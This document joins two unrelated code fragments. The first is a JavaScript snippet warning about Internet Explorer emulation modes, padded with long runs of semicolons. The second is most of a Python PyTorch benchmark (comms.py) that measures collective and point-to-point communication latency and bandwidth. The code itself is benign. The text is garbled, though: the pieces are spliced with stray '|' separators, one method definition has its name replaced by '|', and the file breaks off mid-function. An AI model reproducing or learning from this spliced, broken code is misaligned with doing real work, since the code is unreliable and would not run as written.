;;;;;;;;;;;;;;;;;;;;;;;; // Opera, which might pretend to be IE
}
var emulated = emulatedIEMajorVersion();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
if (emulated === null) {
return;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; // Not IE
}
var nonEmulated = actualNonEmulatedIEMajorVersion();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
if (emulated !== nonEmulated) {
window.alert('WARNING: You appear to be using IE' + nonEmulated + ' in IE' + emulated + ' emulation mode.\nIE emulation modes can behave significantly differently from ACTUAL older versions of IE.\nPLEASE DON\'T FILE BOOTSTRAP BUGS based on testing in IE emulation modes!')
}
})(); | }
function actualNonEmulatedIEMajorVersion() { |
comms.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import time
import comms_utils
import numpy as np
# pytorch
import torch
from comms_utils import paramCommsBench, ensureTensorFlush
### TODO: add these to class variables?
supportedCollectives = [
"reduce",
"all_reduce",
"all_to_all",
"all_to_allv",
"all_gather",
"broadcast",
"reduce_scatter",
"reduce_scatter_base",
"all_gather_base",
"incast",
"multicast",
] # , "scatter", "gather"]
pt2ptPatterns = [
"one2one",
"pairwise",
]
logger = logging.getLogger(__name__)
class MultilineFormatter(argparse.ArgumentDefaultsHelpFormatter):
def _split_lines(self, text, width):
if text.startswith("R|"):
return text[2:].splitlines()
# this is the RawTextHelpFormatter._split_lines
return argparse.ArgumentDefaultsHelpFormatter._split_lines(self, text, width)
# define the collective benchmark
class commsCollBench(paramCommsBench):
def __init__(self):
super().__init__(supportedNwstacks=["pytorch-dist", "pytorch-xla-tpu"])
# def readCollArgs(self, parser):
def readArgs(self, parser):
# read the common/basic arguments
super().readArgs(parser)
parser.add_argument(
"--w", type=int, default=5, help="number of warmup iterations"
) # number of warmup-iterations
parser.add_argument(
"--n", type=int, default=5, help="number of iterations"
) # number of iterations
# experiment related parameters
parser.add_argument(
"--mode",
type=str,
default="comms",
help="benchmark mode",
choices=["comms", "compute", "dlrm", "comms-compute"],
) # alternative is DLRM mode or comm-compute mode
parser.add_argument(
"--b", type=str, default="8", help="minimum size, in bytes, to start with"
) # COMMS mode, begin the sweep at.
parser.add_argument(
"--e", type=str, default="64", help="maximum size, in bytes, to end at"
) # COMMS mode, end the sweep at.
parser.add_argument(
"--f", type=int, default=2, help="multiplication factor between sizes"
) # COMMS mode, multiplication factor.
parser.add_argument(
"--collective",
type=str,
default="all_reduce",
help="Collective operation to be evaluated",
choices=supportedCollectives,
) # collective op to benchmark
# For comm-compute or compute mode
parser.add_argument(
"--kernel",
type=str,
default="gemm",
help="Compute kernel, used for comms-compute or compute mode",
choices=["gemm", "emb_lookup"],
) # Compute kernel: "gemm"
parser.add_argument(
"--num-compute",
type=int,
default=100,
help="one collective for every NUM_COMPUTE compute kernels",
) # Launch one coll for every n compute kernels
# For GEMM
parser.add_argument(
"--mm-dim",
type=int,
default=100,
help="dimension size for GEMM compute kernel",
) # Matrix multiplication dim n, A[n,n] * B [n,n]
# For emb lookup
parser.add_argument(
"--emb-dim",
type=int,
default=128,
help="dimension size for Embedding table compute kernel",
) # Embedding table dimension
parser.add_argument(
"--num-embs",
type=int,
default=100000,
help="Embedding table hash size for Embedding table compute kernel",
) # Embedding table hash size
parser.add_argument(
"--avg-len",
type=int,
default=28,
help="Average lookup operations per sample",
) # Average #lookup per sample
parser.add_argument(
"--batch-size",
type=int,
default=512,
help="number of samples reading the table concurrently",
) # #Samples reading the table concurrently
parser.add_argument(
"--root", type=int, default=0, help="root process for reduce benchmark"
) # root process for reduce and bcast (and gather, scatter, etc., if support in the future)
# TODO: check the correctness of root, should be between 0 to [world_size -1]
parser.add_argument(
"--src-ranks",
type=str,
nargs="?",
help="R|src ranks for many-to-one incast pattern or pt2pt.\n"
"List of ranks separated by comma or a range specified by start:end.\n"
"Pt2pt one2one should set only one rank.\n"
"The default value of incast includes all ranks, pt2pt includes rank 0.",
) # optional: group of src ranks in many-to-one incast or pt2pt
parser.add_argument(
"--dst-ranks",
type=str,
nargs="?",
help="R|dst ranks for one-to-many multicast pattern or pt2pt.\n"
"List of ranks separated by comma or a range specified by start:end.\n"
"Pt2pt one2one should set only one rank\n"
"The default value of multicast includes all ranks, pt2pt includes rank 1.",
) # optional: group of dst ranks in one-to-many multicast or pt2pt
parser.add_argument(
"--pair",
action="store_true",
default=False,
help="Toggle to enable collective pair mode",
)
parser.add_argument(
"--collective-pair",
type=str,
default="all_reduce",
help="Collective pair operation to be evaluated",
choices=supportedCollectives,
) # collective op to pair with the other collective, --collective should be non-empty
parser.add_argument(
"--overlap-pair-pgs",
action="store_true",
default=False,
help="Toggle to enable overlapping collective pair with two pgs",
) # overlap collective pair with two pgs
parser.add_argument(
"--pt2pt",
type=str,
default=None,
help="point to point pattern",
choices=pt2ptPatterns,
) # point to point mode
parser.add_argument(
"--window",
type=int,
default=100,
help="window size for pt2pt throughput test",
) # optional: point to point throughput test window size
return parser.parse_known_args()
def checkArgs(self, args):
super().checkArgs(args)
if args.pt2pt is not None:
args.collective = "pt2pt"
if args.pt2pt not in pt2ptPatterns:
logger.error(
f"Specified pt2pt pattern: {args.pt2pt} is not one of the supported pt2pt patterns: {str(pt2ptPatterns)}"
)
comms_utils.gracefulExit()
args.b = comms_utils.parsesize(args.b)
args.e = comms_utils.parsesize(args.e)
args.dtype = self.dtypeMap[args.data_type]
if args.b < 1:
logger.warning(
f"Starting size (--b {args.b}) should be greater than 1 byte...fix and continue"
)
args.b = 1
if args.e < args.b:
logger.warning(
f"the begin-size (--b {args.b}) is larger than the end-size (--e {args.e})"
)
if args.device == "cpu" and args.backend == "nccl":
raise ValueError(f"NCCL is not supported for device type {args.device}")
if args.c == 1 and args.z == 0 and args.collective in ("all_reduce", "reduce", "reduce_scatter"):
logger.warning(
f"Data validation is not supported for {args.collective} in non-blocking mode, disabled and continue"
)
args.c = 0
# run a few sanity checks
if args.bitwidth < 32:
if args.device != "cuda":
logger.error(
f"collective quantization may not be fully supported for {args.device}"
)
comms_utils.checkQuantArgs(
args.collective,
args.dtype,
args.b,
args.quant_a2a_embedding_dim,
args.z,
)
def runColl(self, comm_fn=None, compute_fn=None, comm_fn_pair=None):
self.backendFuncs.complete_accel_ops(self.collectiveArgs, initOp=True)
self.backendFuncs.sync_barrier(self.collectiveArgs, desc="runColl_begin")
elapsedTimeNS = 0.0
is_blocking = not self.collectiveArgs.asyncOp
enable_comms = False if (comm_fn is None or comm_fn == self.backendFuncs.noop) else True
enable_compute = False if (compute_fn is None or compute_fn == self.backendFuncs.noop) else True
enable_comms_pair = False if (comm_fn_pair is None or comm_fn_pair == self.backendFuncs.noop) else True
# for comms pair mode, force async comms for overlapping evaluation
if enable_comms_pair:
self.collectiveArgs.asyncOp = True
for nIter in range(
self.collectiveArgs.numWarmupIters + self.collectiveArgs.numIters
):
if nIter == self.collectiveArgs.numWarmupIters:
# Flush non-blocking ops to ensure warmup is really complete
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
ensureTensorFlush(self.collectiveArgs.opTensor)
if enable_comms_pair:
ensureTensorFlush(self.collectiveArgs.opTensor_pair)
# Start measuring time after warmup iterations
elapsedTimeNS = 0.0
self.collectiveArgs.quant_time.reset()
self.collectiveArgs.dequant_time.reset()
# reset tensor values for data validation check
if enable_comms:
self.setTensorVal(self.collectiveArgs.opTensor)
# for blocking mode, do barrier before starting collective
if is_blocking:
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic() # available only in py3
self.collectiveArgs.group = self.backendFuncs.get_next_group()
comm_fn(self.collectiveArgs)
# post another collecitve if on comms pair mode, otherwise it's noop
self.collectiveArgs.group = self.backendFuncs.get_next_group()
comm_fn_pair(self.collectiveArgs, pair=enable_comms_pair)
if enable_compute:
for _ in range(self.collectiveArgs.numComputePerColl):
# TODO: investigate the cache effect
# Flush the cache
# _ = torch.rand(6 * 1024 * 1024 // 4).float() * 2 # V100 6MB L2 cache
compute_fn(self.collectiveArgs)
if is_blocking: # should be sychronous, wait for the collective
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
# Measuring time.
elapsedTimeNS += (
time.monotonic() - start
) * 1e9 # keeping time in NS, helps in divising data by nanosecond
start = time.monotonic() # available only in py3
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
end = time.monotonic() # available only in py3
ensureTensorFlush(self.collectiveArgs.opTensor)
if enable_comms_pair:
ensureTensorFlush(self.collectiveArgs.opTensor_pair)
elapsedTimeNS += (
end - start
) * 1e9 # keeping time in NS, helps in divising data by nanoseconds
memSize = self.backendFuncs.get_mem_size(self.collectiveArgs)
avgIterNS, algBW = comms_utils.getAlgBW(
elapsedTimeNS, memSize, self.collectiveArgs.numIters
)
busBW = self.backendFuncs.getBusBW(
self.collectiveArgs.collective,
algBW,
self.collectiveArgs,
)
if enable_comms_pair:
memSize_pair = self.backendFuncs.get_mem_size(
self.collectiveArgs, pair=enable_comms_pair
)
memSize += memSize_pair
_, algBW_pair = comms_utils.getAlgBW(
elapsedTimeNS, memSize_pair, self.collectiveArgs.numIters
)
algBW += algBW_pair
busBW += self.backendFuncs.getBusBW(
self.collectiveArgs.collective_pair,
algBW_pair,
self.collectiveArgs,
)
self.backendFuncs.sync_barrier(self.collectiveArgs, desc="runColl_end")
results = {
"timeUS": avgIterNS / 1e3,
"algBW": algBW,
"busBW": busBW,
"memSize": memSize,
}
return results
def runPt2Pt(self):
self.backendFuncs.complete_accel_ops(self.collectiveArgs, initOp=True)
# warm-up
memSize = self.backendFuncs.get_mem_size(self.collectiveArgs)
self.getPingLatency(self.collectiveArgs.numWarmupIters)
self.getPingPongLatency(self.collectiveArgs.numWarmupIters)
self.getUniBW(self.collectiveArgs.numWarmupIters, memSize)
self.getBiBW(self.collectiveArgs.numWarmupIters, memSize)
self.backendFuncs.sync_barrier(self.collectiveArgs, "runpt2pt_begin")
# pt2pt benchmark
pingPerIterNS = self.getPingLatency(self.collectiveArgs.numIters)
pingPongPerIterNS = self.getPingPongLatency(self.collectiveArgs.numIters)
avgUniBW = self.getUniBW(self.collectiveArgs.numIters, memSize)
avgBiBW = self.getBiBW(self.collectiveArgs.numIters, memSize)
self.backendFuncs.sync_barrier(self.collectiveArgs, "runpt2pt")
results = {
"pingPerIterNS": pingPerIterNS,
"pingPongPerIterNS": pingPongPerIterNS,
"avgUniBW": avgUniBW,
"avgBiBW": avgBiBW,
"memSize": memSize,
}
return results
def getPingLatency(self, numIters):
logger.debug(
"STATUS: begin ping test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = False
# get one-way latency
pingLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
pingLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS, helps in divising data by nanosecond
logger.debug("STATUS: end ping test.")
return pingLatencyNS
def getPingPongLatency(self, numIters):
logger.debug(
"STATUS: begin ping-pong with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = False
# get round-trip latency
pingPongLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx]
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.recv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.send(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx]
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
pingPongLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS, helps in divising data by nanosecond
logger.debug("STATUS: end ping-pong test.")
return pingPongLatencyNS
def | (self, numIters, memSize):
logger.debug(
"STATUS: begin UniBW test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = True
# get unidirectional bandwidth
uniLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
for w in range(self.collectiveArgs.window):
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.isend(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx], tag=w
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.irecv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx], tag=w
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
uniLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS, helps in divising data by nanosecond
uniLatencyNS = [lat / self.collectiveArgs.window for lat in uniLatencyNS]
uniLatencyNS = np.mean(np.array(uniLatencyNS))
_, avgUniBW = comms_utils.getAlgBW(uniLatencyNS, memSize, 1)
logger.debug("STATUS: end UniBW test.")
return avgUniBW
def getBiBW(self, numIters, memSize):
logger.debug(
"STATUS: begin BiBW test with src_ranks=%s, dst_ranks=%s."
% (self.collectiveArgs.src_ranks, self.collectiveArgs.dst_ranks)
)
self.collectiveArgs.asyncOp = True
# get bidirectional bandwidth
biLatencyNS = []
for _ in range(numIters):
self.backendFuncs.sync_barrier(self.collectiveArgs)
start = time.monotonic()
for w in range(self.collectiveArgs.window):
if self.collectiveArgs.global_rank in self.collectiveArgs.src_ranks:
idx = self.collectiveArgs.src_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.isend(
self.collectiveArgs, self.collectiveArgs.dst_ranks[idx], tag=w
)
self.backendFuncs.irecv(
self.collectiveArgs,
self.collectiveArgs.dst_ranks[idx],
tag=w + self.collectiveArgs.window,
)
elif self.collectiveArgs.global_rank in self.collectiveArgs.dst_ranks:
idx = self.collectiveArgs.dst_ranks.index(
self.collectiveArgs.global_rank
)
self.backendFuncs.irecv(
self.collectiveArgs, self.collectiveArgs.src_ranks[idx], tag=w
)
self.backendFuncs.isend(
self.collectiveArgs,
self.collectiveArgs.src_ranks[idx],
tag=w + self.collectiveArgs.window,
)
self.backendFuncs.complete_accel_ops(self.collectiveArgs)
biLatencyNS.append(
(time.monotonic() - start) * 1e9
) # keeping time in NS, helps in divising data by nanosecond
biLatencyNS = [lat / self.collectiveArgs.window for lat in biLatencyNS]
biLatencyNS = np.mean(np.array(biLatencyNS))
_, avgBiBW = comms_utils.getAlgBW(biLatencyNS, 2 * memSize, 1)
logger.debug("STATUS: end UniBW test.")
return avgBiBW
def checkPt2PtRanks(self):
# set default values
if not self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks = [0]
if not self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks = [1]
# sanity check
if self.collectiveArgs.pt2pt == "one2one":
if (
len(self.collectiveArgs.src_ranks) > 1
or len(self.collectiveArgs.dst_ranks) > 1
):
if self.global_rank == 0:
logger.error(
"One2one Pt2Pt requires only a single rank is specified in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
elif self.collectiveArgs.pt2pt == "pairwise":
# pairwise pt2pt requires identical number of ranks in src_ranks and dst_ranks.
if len(self.collectiveArgs.src_ranks) != len(self.collectiveArgs.dst_ranks):
if self.global_rank == 0:
logger.error(
"Pairwise Pt2Pt requires identical number of members in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
# pairwise pt2pt does not allow same rank to exist in both groups
if bool(
set(self.collectiveArgs.src_ranks).intersection(
self.collectiveArgs.dst_ranks
)
):
if self.global_rank == 0:
logger.error(
"Pairwise Pt2Pt requires distinct members in src_ranks and dst_ranks! "
)
comms_utils.gracefulExit()
if self.global_rank == 0:
print(
f"\t collective={self.collectiveArgs.collective}\t{self.collectiveArgs.pt2pt}, src_ranks={self.collectiveArgs.src_ranks}, dst_ranks={self.collectiveArgs.dst_ranks}"
)
def checkCollectiveRanks(self):
if self.collectiveArgs.collective == "incast":
# incast: set default value and exclude root
if not self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks = [*range(self.comm_size)]
if self.collectiveArgs.srcOrDst in self.collectiveArgs.src_ranks:
self.collectiveArgs.src_ranks.remove(self.collectiveArgs.srcOrDst)
elif self.collectiveArgs.collective == "multicast":
# multicast: set default value and exclude root
if not self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks = [*range(self.comm_size)]
if self.collectiveArgs.srcOrDst in self.collectiveArgs.dst_ranks:
self.collectiveArgs.dst_ranks.remove(self.collectiveArgs.srcOrDst)
if self.global_rank == 0:
print(
f"\t collective={self.collectiveArgs.collective}, src_ranks={self.collectiveArgs.src_ranks}, dst_ranks={self.collectiveArgs.dst_ranks}"
)
def initCollectiveArgs(self, commsParams):
# lint was complaining that benchTime was too complex!
(
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
) = comms_utils.get_rank_details(
self.backendFuncs
) # Getting ranks from backednFuncs object, since we cannot use MPI (e.g.: TPU) to launch all the processes.
self.backendFuncs.sayHello() # Informs us where each process is running.
groups = self.backendFuncs.get_groups()
num_pgs = len(groups)
self.comm_size = world_size
self.global_rank = global_rank
comms_utils.fixBeginSize(
commsParams, world_size
) # Ensuring that all-reduce and all-to-all has atleast one member per rank.
allSizes = comms_utils.getSizes(
commsParams.beginSize, commsParams.endSize, commsParams.stepFactor
) # Given the begin-size, end-size, step-factor what are the message sizes to iterate on.
if global_rank == 0:
print(
f"[Rank {global_rank:>3}] allSizes: {allSizes} local_rank: {local_rank} element_size: {commsParams.element_size}"
)
self.collectiveArgs.group = group
self.collectiveArgs.groups = groups
self.collectiveArgs.num_pgs = num_pgs
self.collectiveArgs.device = curDevice
self.collectiveArgs.world_size = world_size
self.collectiveArgs.numIters = commsParams.numIters
self.collectiveArgs.numWarmupIters = commsParams.numWarmupIters
self.collectiveArgs.global_rank = global_rank
self.collectiveArgs.backendFuncs = self.backendFuncs
self.collectiveArgs.collective = commsParams.collective
op = self.backendFuncs.get_reduce_op("sum")
self.collectiveArgs.op = op
self.collectiveArgs.srcOrDst = commsParams.srcOrDst
self.collectiveArgs.src_ranks = commsParams.src_ranks
self.collectiveArgs.dst_ranks = commsParams.dst_ranks
self.collectiveArgs.pair = commsParams.pair
self.collectiveArgs.collective_pair = commsParams.collective_pair
self.collectiveArgs.pt2pt = commsParams.pt2pt
self.collectiveArgs.window = commsParams.window
self.collectiveArgs.asyncOp = False if commsParams.blockingFlag == 1 else True
if commsParams.bitwidth < 32:
comms_utils.initQuantCommCtx(self.collectiveArgs, commsParams)
if self.collectiveArgs.collective == "pt2pt":
self.checkPt2PtRanks()
else:
self.checkCollectiveRanks()
computeFunc = self.backendFuncs.noop
if (
commsParams.mode != "comms"
): # Compute mode related initialization if not in comms-only mode
if commsParams.kernel == "gemm":
computeFunc = self.backendFuncs.gemm
mm_dim = commsParams.mm_dim
in1 = np.random.rand(mm_dim, mm_dim)
MMin1 = torch.FloatTensor(in1).to(curDevice)
in2 = np.random.rand(mm_dim, mm_dim)
MMin2 = torch.FloatTensor(in2).to(curDevice)
in3 = np.random.rand(mm_dim, mm_dim)
MMin3 = torch.FloatTensor(in3).to(curDevice)
MMout = self.backendFuncs.alloc_empty(
[mm_dim, mm_dim], commsParams.dtype, curDevice
)
self.collectiveArgs.MMout = MMout
self.collectiveArgs.MMin1 = MMin1
self.collectiveArgs.MMin2 = MMin2
self.collectiveArgs.MMin3 = MMin3
self.collectiveArgs.numComputePerColl = commsParams.num_compute
elif commsParams.kernel == "emb_lookup":
computeFunc = self.backendFuncs.emb_lookup
emb_dim = commsParams.emb_dim
num_embeddings = commsParams.num_embs
avg_length = commsParams.avg_len
batch_size = commsParams.batch_size
print(
f"emb_dim {emb_dim} num_embs {num_embeddings} avg_len {avg_length} bs {batch_size}"
)
self.collectiveArgs.EmbWeights = self.backendFuncs.alloc_empty(
[num_embeddings, emb_dim], torch.double, curDevice
)
self.collectiveArgs.TableOffsets = torch.LongTensor(
[0, num_embeddings]
).to(curDevice)
self.collectiveArgs.Indices = torch.LongTensor(
np.random.randint(0, num_embeddings - 1, avg_length * batch_size)
).to(curDevice)
lengths = np.ones((1, batch_size)) * avg_length
flat_lengths = lengths.flatten()
self.collectiveArgs.Offsets = torch.LongTensor(
[0] + np.cumsum(flat_lengths).tolist()
).to(curDevice)
self.collectiveArgs.LookupOut = self.backendFuncs.alloc_empty(
[batch_size, emb_dim], torch.double, curDevice
)
self.collectiveArgs.AvgLengths = avg_length
self.collectiveArgs.numComputePerColl = commsParams.num_compute
return (
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
allSizes,
computeFunc,
)
def gatherBenchTime(self, collectiveArgs, commsParams, timeUsElapsedList):
# Push the list to device, then do an all-gather.
timeElapsedTensor = torch.tensor(
timeUsElapsedList, device=self.backendFuncs.get_device()
)
collectiveArgs.opTensor = None
if commsParams.backend != "xla":
timeList = list(torch.ones(
(self.comm_size,) + timeElapsedTensor.shape,
dtype=timeElapsedTensor.dtype,
device=timeElapsedTensor.device,
).unbind(0))
collectiveArgs.opTensor = timeList
collectiveArgs.ipTensor = timeElapsedTensor
collectiveArgs.asyncOp = False
collectiveArgs.dataSize = (
timeElapsedTensor.nelement() * timeElapsedTensor.element_size()
)
collectiveArgs.numElements = timeElapsedTensor.nelement()
# use allgather as all process group should support it
self.backendFuncs.all_gather(collectiveArgs)
self.backendFuncs.complete_accel_ops(collectiveArgs)
return timeList
def printPreamble(self, commsParams):
logger.debug(f"\tcommsParams: {str(commsParams.__dict__)}")
header = "\n\tCOMMS-RES"
if self.collectiveArgs.collective == "pt2pt":
header += "{:>15}{:>20}{:>10}{:>10}{:>25}{:>10}{:>10}{:>15}{:>15}{:>18}{:>18}".format(
"size (B)",
"pingLatency(us):p50",
"p75",
"p95",
"pingPongLatency(us):p50",
"p75",
"p95",
"avgUniBW(GB/s)",
"avgBiBW(GB/s)",
"totalUniBW(GB/s)",
"totalBiBW(GB/s)",
)
else:
if commsParams.bitwidth < 32:
header += "-QUANT\t{:>15}{:>18}{:>25}{:>15}{:>15}{:>15}".format(
"size (B)",
"nElementsPerRank",
"P95 Latency(us): Quant",
"Comms",
"De-Quant",
"Overall",
)
elif not self.collectiveArgs.pair:
header += (
"{:>15}{:>18}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
"size (B)",
"nElementsPerRank",
"Latency(us):p50",
"p75",
"p95",
"Min",
"Max",
"AlgBW(GB/s)",
"BusBW(GB/s)",
)
)
else:
header += "{:>15}{:>18}{:>22}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
"total-size (B)",
"nElementsPerRank",
"nElementsPairPerRank",
"Latency(us):p50",
"p75",
"p95",
"Min",
"Max",
"AlgBW(GB/s)",
"BusBW(GB/s)",
)
print(header)
def reportBenchTimeCollWithQuant(
self,
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
):
if commsParams.backend == "xla":
latencyAcrossRanks = torch.transpose(tensorList.view(-1, 1), 0, 1)[0]
latencyAcrossRanks = latencyAcrossRanks.cpu().detach().numpy()
# quant tensor
quantLatencyAcrossRanks = torch.transpose(
quantTimeTensorList.view(-1, 1), 0, 1
)[0]
quantLatencyAcrossRanks = quantLatencyAcrossRanks.cpu().detach().numpy()
# dequant tensor
dequantLatencyAcrossRanks = torch.transpose(
dequantTimeTensorList.view(-1, 1), 0, 1
)[0]
dequantLatencyAcrossRanks = dequantLatencyAcrossRanks.cpu().detach().numpy()
else:
if isinstance(tensorList, list):
tensorList = [t.cpu().detach().numpy() for t in tensorList]
latencyAcrossRanks = np.array(tensorList)
# quant tensor
quantLatencyAcrossRanks = np.array(quantTimeTensorList)
# dequant tensor
dequantLatencyAcrossRanks = np.array(dequantTimeTensorList)
p95 = np.percentile(latencyAcrossRanks, 95)
